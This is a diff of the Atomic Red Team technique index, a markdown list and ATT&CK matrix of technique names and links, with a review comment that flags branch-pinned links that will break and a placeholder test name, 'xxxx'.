- [T1213 Data from Information Repositories](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1213?T1213.md)
|
||||
- [T1005 Data from Local System](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1005?T1005.md)
|
||||
- [T1039 Data from Network Shared Drive](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1039?T1039.md)
|
||||
- [T1025 Data from Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1025?T1025.md)
|
||||
- [T1114 Email Collection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1114?T1114.md)
|
||||
- [T1056 Input Capture](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1056?T1056.md)
|
||||
- [T1185 Man in the Browser](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1185?T1185.md)
|
||||
- [T1113 Screen Capture](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1113/T1113.md)
|
||||
- [T1074 Data Staged](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1213 Data from Information Repositories](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1005 Data from Local System](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1039 Data from Network Shared Drive](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1025 Data from Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1114 Email Collection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1056 Input Capture](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1185 Man in the Browser](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1113 Screen Capture](./T1113/T1113.md)
|
||||
- Atomic Test #1: Screencapture
|
||||
- Atomic Test #2: Screencapture (silent)
|
||||
- Atomic Test #3: X Windows Capture
|
||||
- Atomic Test #4: Import
|
||||
- [T1125 Video Capture](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1125?T1125.md)
|
||||
- [T1125 Video Capture](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# exfiltration
|
||||
- [T1020 Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1020?T1020.md)
|
||||
- [T1002 Data Compressed](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1002/T1002.md)
|
||||
- [T1020 Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1002 Data Compressed](./T1002/T1002.md)
|
||||
- Atomic Test #1: Compress Data for Exfiltration With PowerShell
|
||||
- Atomic Test #2: Compress Data for Exfiltration With Rar
|
||||
- [T1022 Data Encrypted](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1022?T1022.md)
|
||||
- [T1030 Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1030?T1030.md)
|
||||
- [T1048 Exfiltration Over Alternative Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1048?T1048.md)
|
||||
- [T1041 Exfiltration Over Command and Control Channel](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1041?T1041.md)
|
||||
- [T1011 Exfiltration Over Other Network Medium](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1011?T1011.md)
|
||||
- [T1052 Exfiltration Over Physical Medium](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1052?T1052.md)
- [T1029 Scheduled Transfer](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1029?T1029.md)
- [T1022 Data Encrypted](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1030 Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1048 Exfiltration Over Alternative Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1041 Exfiltration Over Command and Control Channel](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1011 Exfiltration Over Other Network Medium](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1052 Exfiltration Over Physical Medium](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1029 Scheduled Transfer](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
# command-and-control
- [T1043 Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1043?T1043.md)
- [T1092 Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1092?T1092.md)
- [T1090 Connection Proxy](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1090?T1090.md)
- [T1094 Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1094?T1094.md)
- [T1024 Custom Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1024?T1024.md)
- [T1132 Data Encoding](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1132?T1132.md)
- [T1001 Data Obfuscation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1001?T1001.md)
- [T1172 Domain Fronting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1172?T1172.md)
- [T1008 Fallback Channels](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1008?T1008.md)
- [T1104 Multi-Stage Channels](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1104?T1104.md)
- [T1188 Multi-hop Proxy](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1188?T1188.md)
- [T1026 Multiband Communication](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1026?T1026.md)
- [T1079 Multilayer Encryption](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1079?T1079.md)
- [T1205 Port Knocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1205?T1205.md)
- [T1219 Remote Access Tools](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1219?T1219.md)
- [T1105 Remote File Copy](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1105/T1105.md)
- [T1043 Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1092 Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1090 Connection Proxy](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1094 Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1024 Custom Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1132 Data Encoding](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1001 Data Obfuscation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1172 Domain Fronting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1008 Fallback Channels](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1104 Multi-Stage Channels](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1188 Multi-hop Proxy](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1026 Multiband Communication](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1079 Multilayer Encryption](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1205 Port Knocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1219 Remote Access Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1105 Remote File Copy](./T1105/T1105.md)
- Atomic Test #1: xxxx
- [T1071 Standard Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1071?T1071.md)
- [T1032 Standard Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1032?T1032.md)
- [T1095 Standard Non-Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1095?T1095.md)
- [T1065 Uncommonly Used Port](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1065?T1065.md)
- [T1102 Web Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1102?T1102.md)
- [T1071 Standard Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1032 Standard Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1095 Standard Non-Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1065 Uncommonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1102 Web Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
# initial-access
- [T1189 Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1189?T1189.md)
- [T1190 Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1190?T1190.md)
- [T1200 Hardware Additions](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1200?T1200.md)
- [T1091 Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1091?T1091.md)
- [T1193 Spearphishing Attachment](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1193?T1193.md)
- [T1192 Spearphishing Link](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1192?T1192.md)
- [T1194 Spearphishing via Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1194?T1194.md)
- [T1195 Supply Chain Compromise](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1195?T1195.md)
- [T1199 Trusted Relationship](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1199?T1199.md)
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md)
- [T1189 Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1190 Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1200 Hardware Additions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1091 Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1193 Spearphishing Attachment](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1192 Spearphishing Link](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1194 Spearphishing via Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1195 Supply Chain Compromise](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1199 Trusted Relationship](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
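Review bot: every technique without an atomic file now links to the absolute, branch-pinned URL `https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md` (see the T1125 Video Capture, T1020 Automated Exfiltration and T1189 Drive-by Compromise entries in this hunk); as soon as the `uppercase-everything` branch is merged and deleted, all of those links 404. The techniques that do have atomics switch to relative paths in the same hunk (`./T1113/T1113.md`, `./T1002/T1002.md`, `./T1105/T1105.md`), so the fallback should be relative as well, `../CONTRIBUTIONS.md` from this directory, or at minimum reference `master` rather than a feature branch. The replaced form (`.../new/master/atomics/T1125?T1125.md`) also carried the target directory and file name for the missing atomic; the generic CONTRIBUTIONS.md target drops that hint, so keep the technique identifier in the link or the link text if the goal is to steer contributors to the right path. Separately, the regenerated T1105 Remote File Copy entry lists `- Atomic Test #1: xxxx`, a placeholder test name that should be given a real title before this index is published.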
+59
-59
@@ -1,61 +1,61 @@
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1189?T1189.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1155?T1155.md) | [.bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1156?T1156.md) | [Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1134?T1134.md) | [Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1134?T1134.md) | [Account Manipulation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1098?T1098.md) | [Account Discovery](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1087/T1087.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1155?T1155.md) | [Audio Capture](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1123/T1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1020?T1020.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1043?T1043.md) |
| [Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1190?T1190.md) | [CMSTP](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1191?T1191.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1015?T1015.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1015?T1015.md) | [BITS Jobs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1197?T1197.md) | [Bash History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1139/T1139.md) | [Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1010?T1010.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1017?T1017.md) | [Automated Collection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1119?T1119.md) | [Data Compressed](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1002/T1002.md) | [Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1092?T1092.md) |
| [Hardware Additions](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1200?T1200.md) | [Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1059?T1059.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1182?T1182.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1182?T1182.md) | [Binary Padding](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1009?T1009.md) | [Brute Force](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1110/T1110.md) | [Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1217?T1217.md) | [Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1175?T1175.md) | [Clipboard Data](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1115/T1115.md) | [Data Encrypted](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1022?T1022.md) | [Connection Proxy](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1090?T1090.md) |
| [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1091?T1091.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1196?T1196.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1103?T1103.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1103?T1103.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1088?T1088.md) | [Credential Dumping](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1003/T1003.md) | [File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1083?T1083.md) | [Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1210?T1210.md) | [Data Staged](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1074?T1074.md) | [Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1030?T1030.md) | [Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1094?T1094.md) |
| [Spearphishing Attachment](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1193?T1193.md) | [Dynamic Data Exchange](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1173?T1173.md) | [Application Shimming](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1138?T1138.md) | [Application Shimming](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1138?T1138.md) | [CMSTP](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1191?T1191.md) | [Credentials in Files](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1081?T1081.md) | [Network Service Scanning](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1046/T1046.md) | [Logon Scripts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1037?T1037.md) | [Data from Information Repositories](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1213?T1213.md) | [Exfiltration Over Alternative Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1048?T1048.md) | [Custom Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1024?T1024.md) |
| [Spearphishing Link](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1192?T1192.md) | [Execution through API](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1106?T1106.md) | [Authentication Package](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1131?T1131.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1088?T1088.md) | [Clear Command History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1146/T1146.md) | [Credentials in Registry](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1214?T1214.md) | [Network Share Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1135?T1135.md) | [Pass the Hash](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1075?T1075.md) | [Data from Local System](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1005?T1005.md) | [Exfiltration Over Command and Control Channel](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1041?T1041.md) | [Data Encoding](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1132?T1132.md) |
| [Spearphishing via Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1194?T1194.md) | [Execution through Module Load](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1129?T1129.md) | [BITS Jobs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1197?T1197.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1038?T1038.md) | [Code Signing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1116?T1116.md) | [Exploitation for Credential Access](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1212?T1212.md) | [Password Policy Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1201?T1201.md) | [Pass the Ticket](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1097?T1097.md) | [Data from Network Shared Drive](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1039?T1039.md) | [Exfiltration Over Other Network Medium](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1011?T1011.md) | [Data Obfuscation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1001?T1001.md) |
| [Supply Chain Compromise](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1195?T1195.md) | [Exploitation for Client Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1203?T1203.md) | [Bootkit](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1067?T1067.md) | [Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1157?T1157.md) | [Component Firmware](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1109?T1109.md) | [Forced Authentication](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1187?T1187.md) | [Peripheral Device Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1120?T1120.md) | [Remote Desktop Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1076?T1076.md) | [Data from Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1025?T1025.md) | [Exfiltration Over Physical Medium](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1052?T1052.md) | [Domain Fronting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1172?T1172.md) |
| [Trusted Relationship](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1199?T1199.md) | [Graphical User Interface](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1061?T1061.md) | [Browser Extensions](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1176/T1176.md) | [Exploitation for Privilege Escalation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1068?T1068.md) | [Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1122?T1122.md) | [Hooking](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179/T1179.md) | [Permission Groups Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1069?T1069.md) | [Remote File Copy](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1105/T1105.md) | [Email Collection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1114?T1114.md) | [Scheduled Transfer](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1029?T1029.md) | [Fallback Channels](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1008?T1008.md) |
| [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md) | [InstallUtil](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1118/T1118.md) | [Change Default File Association](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1042?T1042.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1181?T1181.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1196?T1196.md) | [Input Capture](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1056?T1056.md) | [Process Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1057?T1057.md) | [Remote Services](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1021?T1021.md) | [Input Capture](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1056?T1056.md) | | [Multi-Stage Channels](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1104?T1104.md) |
| | [LSASS Driver](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1177?T1177.md) | [Component Firmware](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1109?T1109.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1044?T1044.md) | [DCShadow](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1207?T1207.md) | [Input Prompt](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1141?T1141.md) | [Query Registry](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1012?T1012.md) | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1091?T1091.md) | [Man in the Browser](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1185?T1185.md) | | [Multi-hop Proxy](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1188?T1188.md) |
| | [Launchctl](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1152?T1152.md) | [Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1122?T1122.md) | [Hooking](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179/T1179.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1038?T1038.md) | [Kerberoasting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1208?T1208.md) | [Remote System Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1018?T1018.md) | [SSH Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1184?T1184.md) | [Screen Capture](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1113/T1113.md) | | [Multiband Communication](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1026?T1026.md) |
| | [Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1168?T1168.md) | [Create Account](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1136/T1136.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1183?T1183.md) | [DLL Side-Loading](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1073?T1073.md) | [Keychain](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1142?T1142.md) | [Security Software Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1063?T1063.md) | [Shared Webroot](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1051?T1051.md) | [Video Capture](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1125?T1125.md) | | [Multilayer Encryption](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1079?T1079.md) |
| | [Mshta](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1170/T1170.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1038?T1038.md) | [Launch Daemon](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1160?T1160.md) | [Deobfuscate/Decode Files or Information](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1140?T1140.md) | [LLMNR/NBT-NS Poisoning](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1171?T1171.md) | [System Information Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1082?T1082.md) | [Taint Shared Content](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1080?T1080.md) | | | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1205?T1205.md) |
| | [PowerShell](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1086?T1086.md) | [Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1157?T1157.md) | [New Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1050?T1050.md) | [Disabling Security Tools](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1089/T1089.md) | [Network Sniffing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1040?T1040.md) | [System Network Configuration Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1016?T1016.md) | [Third-party Software](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1072?T1072.md) | | | [Remote Access Tools](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1219?T1219.md) |
| | [Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1121/T1121.md) | [External Remote Services](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1133?T1133.md) | [Path Interception](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1034?T1034.md) | [Exploitation for Defense Evasion](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1211?T1211.md) | [Password Filter DLL](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1174?T1174.md) | [System Network Connections Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1049?T1049.md) | [Windows Admin Shares](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1077?T1077.md) | | | [Remote File Copy](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1105/T1105.md) |
